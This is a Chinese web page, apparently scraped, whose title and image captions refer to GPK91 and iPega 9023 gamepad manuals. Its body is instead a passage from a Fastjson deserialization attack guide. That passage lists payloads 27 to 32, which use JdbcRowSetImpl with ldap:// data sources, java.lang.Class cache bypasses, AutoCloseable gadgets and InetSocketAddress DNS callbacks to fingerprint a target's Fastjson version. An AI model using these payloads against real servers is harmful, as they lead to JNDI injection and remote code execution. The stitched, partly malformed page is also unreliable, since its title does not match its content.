gpk91手柄说明书,ipega9023手柄说明书

首页 > 数码 > 作者:YD1662024-04-21 20:12:12

2.3.2.2 判断1.1.16<=version<=1.2.24

payload27(组合拳):

{"username":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://1.2.3.4/POC","autoCommit":true}}

{"username":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1/POC","autoCommit":true}}

和payload26一样,如果下面的比上面的响应快说明版本处于1.1.16和1.2.24之间;1.1.15我本地测试的时候响应很快但是报错Duplicate field name "matchColumn_asm_prefix__" with signature "[C" in class file Fastjson_ASM_JdbcRowSetImpl_1。

2.3.2.3 变种:判断1.1.16<=version<=1.2.11

如果对方用的是JSON.parseObject,那么payload27还有变种。payload28(组合拳):

{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://1.2.3.4/POC", "autoCommit":true}}""}

{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1/POC", "autoCommit":true}}""}

如果下面比上面响应快,说明版本处于1.1.16和1.2.11之间。

2.3.2.4 判断1.2.28<=version<=1.2.47

payload29(组合拳):

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://1.2.3.4/POC","autoCommit":true}}

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1/POC","autoCommit":true}}

如果下面比上面响应快,说明版本处于1.2.28和1.2.47之间。

2.3.2.5 变种:判断1.2.9<=version<=1.2.11

如果对方用的是JSON.parseObject,那么payload29还有变种。payload30(组合拳):

{"@type":"com.alibaba.fastjson.JSONObject","a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://1.2.3.4/POC","autoCommit":true}}

{"@type":"com.alibaba.fastjson.JSONObject","a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1/POC","autoCommit":true}}

如果下面比上面响应快,说明版本处于1.2.9和1.2.11之间。

2.4 关键版本探测2.4.1 v1.2.24

直接用2.3中所提到的延时判断方法即可。

2.4.2 v1.2.47

payload31:

{"username":{"@type": "java.net.InetSocketAddress"{"address":,"val":"rylxkswlfg.dgrh3.cn"}}}

或者:

[{"@type": "java.lang.Class","val": "java.io.ByteArrayOutputStream"},{"@type": "java.io.ByteArrayOutputStream"},{"@type": "java.net.InetSocketAddress"{"address":,"val":"rylxkswlfg.dgrh3.cn"}}]

都是可以的:

gpk91手柄说明书,ipega9023手柄说明书(29)

gpk91手柄说明书,ipega9023手柄说明书(30)

2.4.3 v1.2.68

payload32:

[{"@type": "java.lang.AutoCloseable","@type": "java.io.ByteArrayOutputStream"},{"@type": "java.io.ByteArrayOutputStream"},{"@type": "java.net.InetSocketAddress"{"address":,"val": "mwhajokbdd.dgrh3.cn"}}]

gpk91手柄说明书,ipega9023手柄说明书(31)

gpk91手柄说明书,ipega9023手柄说明书(32)

上一页45678下一页

栏目热文

文档排行

本站推荐

Copyright © 2018 - 2021 www.yd166.com., All Rights Reserved.